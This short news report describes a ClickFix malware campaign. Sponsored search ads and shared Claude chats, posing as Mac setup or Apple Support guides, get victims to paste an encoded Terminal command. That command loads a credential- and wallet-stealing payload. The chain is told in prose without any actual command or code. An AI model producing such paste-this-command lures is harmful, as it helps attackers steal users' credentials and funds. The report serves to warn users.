RESEARCHERS have found that criminals are using sponsored search results and shared Claude chats to lure Mac users into a ClickFix attack, a social‑engineering technique that covertly installs malware on the device. The technique involves ads that appear to link to the legitimate claude[.]ai domain but resolve to real Claude shared chats, framed as “Claude Code on Mac” or Apple Support guides.
The attackers prompt victims to open Terminal and paste a base64‑encoded command, which fetches a loader shell script from attacker‑controlled infrastructure and runs it in memory. The script profiles the system, downloads a second‑stage payload, and executes it via osascript, giving the attacker remote code execution without dropping a traditional application.
This culminates in a MacSync‑style payload that harvests browser credentials, cookies, Keychain contents and crypto wallet data, sending the information to attacker servers over HTTP. Independent research by BleepingComputer is noted in the article, and users on macOS Tahoe 26.4 and later are warned to be cautious and verify instructions independently. according to BleepingComputer